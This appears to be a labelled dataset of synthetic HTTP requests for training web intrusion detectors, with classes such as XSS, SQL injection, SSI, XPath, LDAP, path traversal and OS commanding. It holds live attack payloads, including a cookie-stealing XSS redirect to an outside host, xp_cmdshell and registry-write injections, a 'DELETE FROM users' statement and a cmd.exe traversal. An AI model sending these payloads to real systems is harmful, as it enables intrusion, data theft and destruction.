If-Unmodified-Since: Sat, 19 Dec 09 19:06:15 CET
If-Match: *
If-None-Match: "XBOcKZN7Bz3uM7Yy"
If-Range: "G..oIsvFTps4g1nGtpp"
Max-Forwards: 6437
MIME-Version: 1.8
Pragma: a8veae=fheo
Proxy-Authorization: oi9oe y4nsSu=2nte1ibw
Authorization: Basic ZXhnZnNkazptNmpIbnR0
Range: 853418-,-430
Referer: /i0ze.cgi
TE: trailers
Trailer: Accept
User-Agent: t1aefn (w2PCYry0_; niOIbGWz; eVyixV@pHv; wIvGKvxy)
UA-CPU: 68000
UA-Disp: 780,4386,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 707x739
Via: 3.3 www.yu5ol.jpeg:6, 0.8 www.creo4t.png, FTP/0.7 105.102.160.82
Transfer-Encoding: foctbw
Upgrade: msdjj/6.3, nhneNR/6.0, amsilt/6.3
Warning: 819 www.pedj.gif "e9rth" "Tue, 15 Sep 09 22:46:26 GMT"
X-Forwarded-For: 138.39.90.47
X-Serial-Number: 52385869909
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37839
Start - Id: 40735
class: SSI
GET /e1JMmWPs/b9owuibthra/nSucvQ5uAxiKFwoqAOO8/oclohddrl/fnmcnnl7nhygnihey/xPJcMC@/eW0MnGvzYPT/nlnipppiEqsha/DlfKdot08pch4uaHp.asmx?8esouf2MflhOohy=vLsgMxZ%403k&ixbtftkrnocts=acefdrtaccess_log+hfromsnevoge&eg=fn HTTP/1.1
Host: 204.51.25.115
Connection: keep-alive
Accept: audio/*, application/x-tar, image/jpeg
Accept-Charset: gb2312;q=0.7, iso-8859-6, macintosh;q=0.6, iso-8859-8-i
Accept-Encoding: *
Cache-Control: no-store
Client-ip: 16.178.105.52
Cookie: siaa2a=<!--   #odbc   statement =  "select     swN2,     aosut, on     from     4Sgdrirr  order  by    0,     99,     2"  -->;ltBslzdqsipEf9i=l;rhL=sqH6lP9V
Cookie2: $Version="1"
If-None-Match: "NitcZ6z0junqV823aM4"
Max-Forwards: 692
MIME-Version: 5.3
Referer: /rrarot/4bwldn.pl
User-Agent: Mozilla/0.6 (Machintosh; U; Mac OS X 2.5; tn-es; rv:2.3.8) Gecko/87534592

null

End - Id: 40735
Start - Id: 47864
class: XSS
GET /eBFtd3c/hSEMtZOvCiTMUACx/kha04ieek/erhaAMjkoQUjmDT/5wu9eaiispdhente/5adminBa.YsHynXuhavingIe/nmynossaaeLaftSa/ea2pSGT1fmQck0HgYBua.nsf?t6eb=i&conoi3tjtmTb=eigu7geddr6Iem&e0mpati=917&nscfCkeed3teue9=y-8y&R_.allCVlinklE0=sr0e%7CuGsxeurwindow.opene-&tatjjieile=8418053&nssqdmIZN=954408125&huetdnbonc=%3Cimg+++++src%3D+%22+++mocha%3A%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.esmeie.com%2Fcgi-bin%2Froit.cgi%27%2Bdocument.cookie%29%3B%5D++++%22+%3E&ztistsl=eu&yoowe2im=sV.aV&siS2-PCKP=d&Aiils9awo4o5h0b=mdiMaoiase+nr&nullP6SUQ=895488 HTTP/1.0
Host: www.sude.de
Connection: keep-alive
Accept: video/*, text/plain;q=0.5, image/*;q=0.3
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 5.197.242.191
Cookie: 3evishneqeoen=1GbcbW_;ar=rgQa;r6IsGpyit1=sc7HPr;n9tehtue2etmeIn=u_5;oenejf=5572018
Cookie2: $Version="8"
Date: Fri, 15 Jul 05 04:41:51 GMT
ETag: "7FkK8i3Djc70HRyX"
Expect: teast5=egohe9Eo;ieasj=rsrnmih
From: 5uawbe5@Rlotbsnho.net
If-Modified-Since: Mon, 13 Oct 08 19:18:02 UTC
If-Unmodified-Since: Wed, 22 Jul 09 15:27:54 UTC
If-Match: "HZ4toqp_XQEkBE7tuQ"
If-None-Match: *
If-Range: "LT1pU7QIvOSM@Aaau"
Max-Forwards: 1
MIME-Version: 9.4
Pragma: eux8O='sbirs'
Proxy-Authorization: seid10 cgreft=hgtii8If
Authorization: Digest algorithm=MD5-sess
Range: 595606-7,222673-07
Referer: http://hohteec.net/ipbheE/kgxOre.aspx
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: osehe (lX0QEG-@M8; ol5xQ6)
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-Pixels: 3411x5439
Via: 2.0 138.209.196.173:24563, sTrb/6.3 www.8xc5U.htm
Transfer-Encoding: gzip
Upgrade: eceRm/0.3, e5aiw8/4.3, ahnzt/2.0
Warning: 546 www.taehteaa.gif "qmeXpetfcrEeeEci" 
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 110017564718
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47864
Start - Id: 45300
class: PathTransversal
GET /3tvruerhdalsrtecd.jpg?oReoTmqneay=4354178&sahtaccesandvWTspsUOm=ttsi&_f5Xb=esy1eOnn&iry9tto=66&t5iokw5se=yro9y&@group byv7Q@j=c7eo+&arWe=nb%7Eancle%26q&ers=ezstt&8d=ebyh%27ehhorm&Hm0=56&hpzvwCeeEe=eIjel&rsegpiwlnbre=r5sCR.v8b&gNivdpE=9%29ov&5TSVA=mearHnta%7Ers%5B&bLAJFsvmhttps=114 HTTP/1.1
Host: www.syunrh.org
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.6
Accept-Language: a:\windows\boot.ini
Cache-Control: max-age=3
Client-ip: 27.71.37.6
Cookie: oardnlnszm4swt=p
Cookie2: $Version="84"
Date: Thu, 28 Sep 06 11:45:58 UTC
From: pagitt@cjt8x8s.it
If-Modified-Since: Tue, 10 Jun 08 23:03:17 GMT
If-Unmodified-Since: Thu, 28 Oct 04 15:34:23 GMT
If-Match: *
If-None-Match: *
Max-Forwards: 826
MIME-Version: 8.6
Pragma: no-cache
Authorization: NTLM RXMxb2FkaVJlYWV0bjFhY3NzczRFaWhtRWVvcm43NHdqc01zb2lsczM=
Referer: /5nodd11/6orb/yceog.swf
User-Agent: daiem8stfqneEo
UA-Color: color32
Via: raefCy/7.3 136.215.18.252
Transfer-Encoding: deflate
Upgrade: eoc/0.4, w5qFeo/8.6, 8aald/8.9, Neo9gn/0.6, nirnu/4.7

null

End - Id: 45300
Start - Id: 49656
class: XPathInjection
GET /qohsgtTxuer8sitgl/ba/e65f/enifnlne4Hn2/tzBpw/s2iby/f1hexofxensHh/vk6obthhQdkt.nsf?cdah=rknullif&MGeuzlentfvh3=tmp50+ast%28R%276amoT3&OoteesipvlUiYai=%28i+%3C++count%28cft%2Fchild%3A%3Atext%28%29%29+++++and++j+++%3C++count%28iuy%2Fchild%3A%3Acomment%28%29%29+++and+k+++%3C+count%28ga%2Fchild%3A%3A*%29+++%29&iss2aBeojsn=%2F%26d&qdnSmor1Nuor=6&yunphni1HTTt=0rstyleE&ouoo4kuooard=ansscriptichild8h&7yeu=3&pajhqeisnTrglrr=Yr3h&negajohE=e1%26&sna1suefdaabtit=ts%24 HTTP/1.0
Host: 6.156.204.241
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: d8f=s
Client-ip: 135.193.196.43
Cookie: Dyamsgroup byLE=yr5u=oa8tmptn ylnullrrm&;5GaYbfryNnph-hm=tz;eoniiShotIievnD=wnucsmnfevbnlndc;BRKnqbpMGZ2=tYfwF3;amamrmHoHcn3=043;ltaoir=ftWJ2m9
Cookie2: $Version="12"
Date: Wed, 17 Dec 08 17:02:50 CET
ETag: W/"tMSsJ3bLqozrYkMJ"
Expect: httd
From: rl5Ut9Om@ezgu03ute.cz
If-Modified-Since: Sat, 21 May 05 13:56:57 UTC
If-Unmodified-Since: Fri, 18 Jan 08 24:43:53 UTC
If-Match: "xbREwAPkCgZfiYa3i-5"
If-None-Match: "bUhCLeXrmvwZKEl"
If-Range: Thu, 05 Apr 07 13:17:35 UTC
Max-Forwards: 295
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: -377,00-3
Referer: http://3oetol.st/iTiswij/fbeAbygr.mpeg
TE: trailers,gzip;q=0.6
Trailer: Via
User-Agent: c1Uh (hRU3Y@U; pD19sy9W; sAW5vA; iWYs3C4; grfNwUwHtK)
UA-CPU: PowerPC
UA-Disp: 014,944,16
UA-OS: Windows NT
UA-Color: color8
Via: tit3a/4.8 188.75.119.134
Transfer-Encoding: identity
Upgrade: nn7ooi/9.0
Warning: 824 www.stbsbbt.html:52 "nn3oteHrle6uoaRrz" 
X-Forwarded-For: 146.252.64.34
X-Serial-Number: 38921697
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49656
Start - Id: 44718
class: PathTransversal
POST /ntitCnoT/mEwDpA/isterhwt1eie/BSe@cTXocvI/hzzSVutTQG/V4Bt65VzLJM/wcZiaZYQC/nYc/DS0muoxwd.css? HTTP/1.0
Content-Length: 279
Content-Language: t
Content-Encoding: compress
Content-Location: http://www.rrOms.st/rhiica/toe6oo/emthEAne.php3
Content-MD5: cmJubGx0c3NhbW9mZWVabg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 13 Mar 07 01:51:39 GMT
Last-Modified: Wed, 13 Dec 06 24:31:10 UTC
Host: 196.35.217.21
Connection: close
Accept: text/html;q=0.1
Accept-Charset: *
Accept-Encoding: identity, deflate, deflate;q=0.9, compress;q=0.4, compress;q=0.3
Accept-Language: respEie-ess, ixt-1aadirvo, Houlrmt-rc, oc-fscvpj;q=0.5, d-jnnih
Cache-Control: min-fresh=5011
Client-ip: 230.63.102.101
Cookie: ss7e=H(iitsoc2l;ajByyiuwlww2sqI=34990;4scriptGL4=69-Mw9BWgy;eSb=6unaETsists;euosepotEntCkes=eid9n;nglta9t9ws=%]o
Cookie2: $Version="777"
Date: Tue, 22 May 07 16:58:38 GMT
ETag: W/"iZhuf9TR391qS9y6Uib"
Expect: iLhe
From: ntofsxe@nilrhaih6.gov
If-Modified-Since: Thu, 08 Jan 09 05:44:29 GMT
If-Unmodified-Since: Fri, 19 Jan 07 21:46:30 CET
If-Match: *
If-None-Match: "ucjM3TZymFySr8hhU"
If-Range: Sat, 23 Feb 08 14:11:33 UTC
Max-Forwards: 65
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: o7lshm rootirq=tt9s
Authorization: NTLM c3VudHl0VWFxaWN0cW9uZWVlbXB1ZHJyZWN0TjVkM2F0ZjVzYWFtcmhyZW5RZQ==
Range: 8542-,-709
Referer: http://sareehth.de/aHtejte/ee5mAd/nVjf3d/chdenrce/iw4aeya.rar
TE: chunked,gzip
Trailer: Proxy-Authorization
User-Agent: aq4ts6wVSI http://www.tvstecTs.com
UA-CPU: MIPS
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 491x774
Via: teunb/3.1 120.20.236.151:953, 6.9 29.39.120.173
Transfer-Encoding: ttmwo; whnei=IauLn8
Upgrade: hcWX/1.9, Lttry/9.2, exAer/3.6, rnt/7.8
Warning: 427 207.57.123.57 "prsEe79slxhsh" "Thu, 19 Jul 07 03:06:44 UTC"
X-Forwarded-For: 37.2.49.250
X-Serial-Number: 145776
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

XsrtgaiXmeo=anetcat+pretrtue5dh&deevhthabowTw=aMxNwSW&2roh4otSay=doc(    file:///c:/Gi/pai9n.xml  )&tpqeqbn=iRe&lngnf= phph  daee&0iier5A6evmerl=4709746463&acuaoavleegodi=nfl&rn1jalat=122390386&oToj0ros=82C9qUuXE5FN&emN_2RChKfphpy=i5node)&ebnlwiIngd9en=?w

End - Id: 44718
Start - Id: 39843
class: SSI
PUT /eIplnurdsMo6ad/eI3Usl34A3tiMCCL/aifbh4tthy/6ttlcby3eocqdnww/Yjnrr/unionpXRcatREV/jN6VO/s6v/hM3TrZsFK8oxMH/sotU/otlpeehah8/nkeeEthleegnn.swf? HTTP/1.1
Content-Length: 257
Content-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Host: 255.250.69.189
Connection: llbixetL
Accept: */*;q=0.3
Accept-Charset: iso-10646-ucs-2, x-mac-greek, iso-8859-5
Accept-Encoding: <!-- #include     virtual="/var/log/httpd/access.log" -->
Accept-Language: *
Date: Tue, 01 Apr 08 09:03:55 CET
ETag: "dUDViYkUsEROtwTmV1"
If-Match: *
Max-Forwards: 429
Referer: /ohvo46/s7b5rds/ocot9/yiat/uttG.tar
TE: trailers
User-Agent: Mozilla/6.9 (Windows; U; Win 9x 8.2; nl-io; rv:0.4.7) Gecko/57952192
UA-CPU: PowerPC

mdedfc=&eandTeo7NiOlsds&oro=mit1staiNq7Wuu&el01m=beavOb&aOdsiuo3er=skechTotas&8ntrpsEshitcmI=a3owgetiau8hnw&wDkImC9a=tea&aeSKae=eaen] \fos\ieeurrO&op3pN=t0d&bcxmlEOAie=wesLDa6nt&ywy5aamnb2an=:drtiggfrea6posnuC&iqgY=68636417&3MWCJ4xibOH-=04siIaail7

End - Id: 39843
Start - Id: 43829
class: OsCommanding
GET /msadc/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 113.55.212.162
Connection: TsiPUS
Accept: image/jpeg
Accept-Charset: *
Accept-Encoding: gzip;q=0.7, compress;q=0.2, compress;q=0.7, identity, identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 172.122.152.72
Cookie: 9a3epnq=63;d5etxlt=c)nE4passthruiframemhat1apDoaEA;eehtw1psatkoaui=22165;yih0un=0045697
Cookie2: $Version="567"
Date: Fri, 11 Dec 09 21:33:39 GMT
ETag: "XjNn@14_sGqxnijJkTZ"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Tue, 07 Jul 09 04:27:31 CET
If-Unmodified-Since: Mon, 15 Jan 07 03:10:45 CET
If-Match: "j@5YzCedrakc5Y9"
If-None-Match: "_Drnio4cZYcVGfkG@p69"
If-Range: *
Max-Forwards: 43
MIME-Version: 9.7
Pragma: hm1ismir=u0Hafm
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: NTLM eWEyYnJkMmxlTndpY3RTa2llb2RFaDFvN2h0NTltYnF1bXpucFRo
Range: -694,-90120,-768
Referer: http://www.neuos.ch/eheSkl/UhnDiwe5/iseeIlo.png
TE: trailers,trailers
Trailer: Accept
User-Agent: ytopoa/9.4.9
UA-CPU: PowerPC
UA-Disp: 7509,580,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6925x167
Via: 9.8 4.246.171.36
Transfer-Encoding: compress
Upgrade: ogl/5.5, riwhR/8.3, eedl4/2.6, eOr/4.7, eho0/5.4
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 33.130.8.36
X-Serial-Number: 179501201
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43829
Start - Id: 35351
class: SqlInjection
GET /I8ey/P@unionw@07IobetOd/wNpAwVQ7qamfbqDDmZ3/EJbTz_QxUx03XiC/ien3tpen7jo7o/csU.i8fDBEjf2DB_3/vwBlliken_5nph-LWYN/EEXtOnxp_idy7/een/iframe40Z2L1tOlnph-ED/eEnnk.msf?yP=location4cN9sl%2Fwindow.openii&s3aa=e%27ewez&.xB3jJlogCkuP3=676311850&SdceUjK=t&zo=eo+oaT9%5C+les4a6l+&rtsappp17aOr=55734050&xr54onEofh6nR=empa&OabdrwrT=eGsn&slnsieesi8m=8&tzsHladaeoreo=%27++OR++++%279rcegr5la%27++%3D+%27sgy%27%2B%277ur1ebL%27&cWl7boRq=K0dMne1%25rihr&wMegntEzreiIy=109282060&naWdg=16002383&bz3ZgbnBJQvarj=130 HTTP/1.0
Host: 110.70.43.92
Connection: close
Accept: application/postscript, image/*
Accept-Charset: *;q=0.2
Accept-Encoding: deflate, deflate;q=0.0, identity;q=0.0, gzip
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 85.208.223.94
Cookie: fae=3;cpeu2ti1=cOZQ4D;eiop8=7acopyis;ysH4sn=rJ-krrVUVfCW;tsrihf0=syrb;d5ia2=eauiemeTonE]dr
Cookie2: $Version="914"
Date: Tue, 08 Jun 04 09:06:53 GMT
ETag: W/"_UGz7wT0hbLk_psH8NC"
Expect: senlwad
From: s1wji5ah@eWWEiNhsrw.de
If-Modified-Since: Sun, 15 Jan 06 19:48:25 CET
If-Unmodified-Since: Wed, 08 Dec 04 05:14:12 GMT
If-Match: "uHkTIqG13BAnotizka6W"
If-None-Match: "IdUIXfhUkLcOZzSVqI"
If-Range: Sun, 31 May 09 02:05:32 GMT
Max-Forwards: 4606
MIME-Version: 4.3
Pragma: tWh12sdl='ecsaatl'
Proxy-Authorization: NTLM b25yZlM5N2Roc25lb29uc2dyaXN4dHJiZmVnYWRlbGVOZm1pd3RsdGVJ
Authorization: Digest username="cue6"
Range: 1609-18413
Referer: /g3Edic/mcpltcdy/7neuagdh.css
TE: chunked
Trailer: Cache-Control
User-Agent: Mozilla/3.2 (Machintosh; U; PPC Mac OS X 9.6; Dw-y5; rv:9.6.4) Gecko/44569203
UA-CPU: 68000
UA-Disp: 8257,8417,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 739x825
Via: 2.9 www.gfadl.gif
Transfer-Encoding: evtn; rnnyn5=5ugf3o
Upgrade: gerh/9.6
Warning: 990 www.iarai.html:3656 "ttstnoOdn" "Mon, 11 Sep 06 03:23:34 UTC"
X-Forwarded-For: 70.158.64.159
X-Serial-Number: 06713
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35351
Start - Id: 41202
class: SqlInjection
GET /s-Qm5oZR7H@4/dxSK/8uLAhk4S/dbN9Ia5/0yrspeEe/FjHg52/e@-qlVORwKNxm6C/Fofetnma.nsf? HTTP/1.0
Host: www.Lnbsceo8.fr:4
Connection: close
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.6
Accept-Encoding: '    union select    sum(nt)  from   etbw--
Accept-Language: uode-onji2Rn;q=0.5
Cache-Control: no-cache
Client-ip: 166.93.9.240
Cookie: r2o=laEsr;turclnem=e.K@lAUz_
Cookie2: $Version="6"
Date: Sat, 23 Jul 05 05:50:28 UTC
ETag: W/"EEGkhT5mI@eMWl_1"
Expect: ttfr=i4irsb;s65p1tr=etl9i
From: aaoa@eCueedro8q.cz
If-Modified-Since: Thu, 17 Feb 05 18:11:01 UTC
If-Unmodified-Since: Fri, 03 Apr 09 07:47:35 GMT
If-Match: "VLk6Hk1THR8xrseFm9"
If-None-Match: "HpaNwuQLt.8twM35"
If-Range: *
Max-Forwards: 4
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: QnNEm sle7s=ykdes
Authorization: Basic VXNnQ25paTpoQW1Pb2hhZQ==
Range: 38-,7259-27,6749-28
Referer: http://fdIl5.uk/m6bnyelj/tDag/xaio/miyin.wmn
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/4.3 (Machintosh; U; Mac OS X 9.7; g1-jf; rv:3.6.5) Gecko/23190045
UA-CPU: MIPS
UA-Disp: 8221,0714,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 9560x6945
Via: asatoa/8.7 www.eoerNiUy.shtml, FTP/0.5 5.236.33.155, 2.1 www.tln9r1i.tiff
Transfer-Encoding: compress
Upgrade: ier1a/3.7, r6i/0.4, snuns/2.3, blds/8.7
Warning: 671 80.33.40.15 "i4sm64ftefxa" "Thu, 27 Jan 05 16:05:22 CET"
X-Forwarded-For: 25.2.55.98
X-Serial-Number: 9505530425947859
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 41202
Start - Id: 49430
class: XPathInjection
GET /de3lgtdaoBaosu/fh/p9uisga/mHNVY/ncLsam-_ncmdJH/nesgOiWeleoreWeial/edpm/lehou/dlvrYSSpW9PqobY0/qMegy@Alli.php4?.jlpassthru1=06556++++or+++++1%3C+dn9afi%2Firmev%2F2tao%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D0%5D++or++44%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.1
Host: 53.19.213.99
Connection: Pasot
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 64.61.159.147
Cookie: eelo=187588325;etZ3v=a4sb_9;oX1NZja60dkF=1915;etrh=lxK4HWs@;axevh=46012669
Cookie2: $Version="722"
Date: Mon, 10 Apr 06 03:46:37 UTC
ETag: "6KlxO_9ouuEMb1v4Ilw"
Expect: 100-continue
From: lyE3Znu@romta.biz
If-Modified-Since: Tue, 08 Sep 09 23:53:49 GMT
If-Unmodified-Since: Fri, 01 May 09 05:50:15 CET
If-Match: "KcPEIEblBQ-CmKz_cXNo"
If-None-Match: *
If-Range: "22IR6tW9yoh_ewVYLb"
Max-Forwards: 1
MIME-Version: 3.8
Pragma: rp='aa8d'
Proxy-Authorization: Basic dHR0clJ5dTY6Zm9kamM3Yg==
Authorization: ohaE rdidhahe=g4aqeoxu
Range: -32,-92418
Referer: http://www.piis.de/hrenre/s9phecia/snti/hdlctes7/28hcKE.js
TE: chunked,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/9.7 (Machintosh; U; PPC 4.8; hw-vo; rv:3.2.7) Gecko/03349912
UA-CPU: StrongARM
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5208x110
Via: hieis/3.4 28.218.103.172
Transfer-Encoding: aeOew; hetnephe=htrooc
Upgrade: e0oOd/9.2, ouh2i/3.3, Ncur/2.5
Warning: 168 www.mBsttTo.jpg "zsvb" "Fri, 02 Nov 07 10:06:41 UTC"
X-Forwarded-For: 43.207.47.88
X-Serial-Number: 812184590933752195
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49430
Start - Id: 38271
class: LdapInjection
GET /V0allinph-R5uj/v9/otudbrh6osf/mnvAYTYyN8CSs@mv/osunrhsoft/5K/d0QlikeeincludeCy/aeeE/nPrul8X6cV1GPX_8K/ilcUtsqgsAew/.3yMEeKOprocessing-instructionM.asp?objectmocha-fYg8=%29++++%28+++%7C++%28displayName%3Dhad*%29+%28name++++%3D+had*+%29%28++++mail%3Dhad*%29&9ri9gs=2&fypofjtipnhtngh=Bslsm HTTP/1.1
Host: 170.182.139.8
Connection: keep-alive
Accept: */*
Accept-Charset: utf-8;q=0.0
Accept-Encoding: identity;q=0.8, identity;q=0.2
Accept-Language: *
Cache-Control: ogcer=ot
Client-ip: 227.248.33.223
Cookie: 5nlqliaszuft=0;caiicdpectp4hlN=tw)t;te=56854624;mena=cLJefOT;aaCeqmwcb=99173772
Cookie2: $Version="30"
Date: Mon, 08 Aug 05 10:37:25 CET
ETag: "xaVLYvomP3MKC3Xw"
Expect: 100-continue
From: iaon@um9ltetugp.biz
If-Modified-Since: Tue, 21 Mar 06 09:28:53 GMT
If-Unmodified-Since: Thu, 31 Aug 06 08:57:45 GMT
If-Match: ".Ihim2K9CjyoZvLuNKrf"
If-None-Match: "@wfsLg-jP-e4XxEwK"
If-Range: Tue, 16 Nov 04 18:44:11 GMT
Max-Forwards: 4995
MIME-Version: 0.2
Pragma: ahcgitt='9alT70Lm'
Proxy-Authorization: NTLM ZXJydTFhY2xuaHV5YTBsYWFlZHVlbmF3aXJkbnV0aW10YQ==
Authorization: Basic RG90bWQ6OWVhZXRzaA==
Range: 61-,82592-5
Referer: http://www.opgt.com/pleoeewy/tieeb/tildge/i3selr/fNtl1ua.ace
TE: deflate,chunked;q=0.7,deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.9 (Windows; U; Windows NT 6.1; hR-tj; rv:5.3.8) Gecko/73616036
UA-CPU: PowerPC
UA-Disp: 284,6564,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4041x0261
Via: HTTP/2.2 www.ue71f30o.css
Transfer-Encoding: gzip
Upgrade: o4f/8.5, ihuE/9.9
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 165.116.155.114
X-Serial-Number: 5189731
----: ------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 38271
Start - Id: 41400
class: SqlInjection
PUT /5YWhhMXWvbscripts_ec/sR6jNPYG/eeerwtenJrQacoaragh/5AwSTxC.@WQpQeGd/f_9B.sh? HTTP/1.1
Content-Length: 167
Content-Language: lnwcloe,l
Content-Encoding: gzip
Content-Location: http://www.kwn2.cz/iNbdtr/iebea/xbiaisis/roSs3n.tiff
Content-MD5: MFNJYWk1cjhsRW9zZVRMOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Sep 08 03:14:32 UTC
Last-Modified: Fri, 03 Apr 09 07:19:46 GMT
Host: 154.17.134.189
Connection: keep-alive
Accept: video/quicktime, text/*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: gzip, identity, compress
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 87.5.203.76
Cookie: n0=7597;idt39Xks='ta;na=82;btisaytrk0cH=27711540;rfThihr=Oetrasleax
Cookie2: $Version="59"
Date: Wed, 17 Jun 09 11:58:12 CET
ETag: "lIiRlIPKte_9Hpgpj"
Expect: 5ERmu=ncdsee
From: xttrniQd@tSeAtnO.net
If-Modified-Since: Tue, 27 Jul 04 03:36:56 GMT
If-Unmodified-Since: Wed, 15 Aug 07 15:54:27 CET
If-Match: *
If-None-Match: "ikY4LdRx4FgeIqD8dXF"
If-Range: Thu, 14 Apr 05 23:51:19 CET
Max-Forwards: 3
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: Basic VGRydHNtdDp0YUhnOW84RQ==
Range: 711-
Referer: /axrr5wi/ufH2wgvi/gr5Smdi/f45urSB/oeSlidgn.nsf
TE: deflate;q=0.1
Trailer: If-None-Match
User-Agent: no6oqsanse1esed
UA-CPU: 68000
UA-Disp: 0223,7526,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1178x5140
Via: 1.2 131.110.131.35:8054, 9.6 124.224.232.163
Transfer-Encoding: gzip
Upgrade: ltbi/4.7, tales/0.8, zhnie/8.7, osts/9.3, yne/5.8
Warning: 883 www.uoctiy9.gif "iy8rsanss" "Tue, 08 Apr 08 02:11:02 CET"
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 3067055271
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

6_SPgpUtTwB=9tl&oexiladhah=lsanqecps' );   DELETE FROM    users    WHERE   upper(username)     =     upper('admin&sZ5td3tzwttrN=88465814&tcdu=dc|xi s

End - Id: 41400
Start - Id: 40977
class: SqlInjection
GET /ejtlpecC0Et9/usr.vWJXxI/icA6e6pm/57nzyyeidagr/iYVVwzg/rjMIyD/t-PwGBn3T1yxypUa/hEXNiDr6zg.a_w0T8/sW/fonH-0WDfnp0M/ybikT.html?swidheeeaxum=992&VpOPc7D1passwdORv=ae+%7ElaanaTconnectcx%7C HTTP/1.0
Host: www.wHGptre7.be
Connection: close
Accept: application/postscript;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: ';EXECmaster.dbo.xp_cmdshell'cmd.exe
Accept-Language: exec     xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','ut1TF8et','REG_SZ','DBMSSOCN,hackersip,80'
Client-ip: 28.32.57.10
Cookie: ddt=04239;ife=38;shw=63;afgStLstsGs=89624
Cookie2: $Version="886"
Date: Fri, 28 Apr 06 10:17:00 GMT
Expect: jcnei8e
If-Modified-Since: Mon, 17 Oct 05 03:55:46 UTC
If-Unmodified-Since: Tue, 19 Oct 04 11:53:05 UTC
If-Match: "P6KQhb5a6R8_GHSs"
If-None-Match: *
Max-Forwards: 7
Pragma: dgr=LylNnao7
Authorization: NTLM YW5lN2hjbEFyc0F0dE5hdHNhZXNzMHVyVHNsTmZubG5saDFlb2V4ZXJmZW9vdA==
Referer: http://www.dwexp.biz/Grrneh/hyosnm.bin
Trailer: Pragma
User-Agent: hrmntaYv/4.9
UA-CPU: PowerPC
Via: 6.7 www.ndee4ei.gif
Transfer-Encoding: oirU
Warning: 206 www.exahet.tiff "tnnU5ihiheein" 
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40977
Start - Id: 49238
class: XPathInjection
GET /axydpcSFNg1/di9dlibted4/eve9iehSbrus/xstdinJJsOmXo/j8EdK9Z6.mjI/sp-WcS.aspx?re8uanh8owd=554&ll=448922&ambivxiaeiI=oyt4t3%27+or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28+%29%3D%28%28+i%2B++++j++%2B+k+%2B+l++++%2B++++1%29%5D+++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or++++%27jihaEo%27%3D++%27+mu%27+++or&xp_Faccept@xp_L=8838211914&e67ROlkeeff=9931&c9eu=649 HTTP/1.0
Host: www.beliueo.it
Connection: eh0tb
Accept: video/*;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.1, gzip, identity, gzip;q=0.0
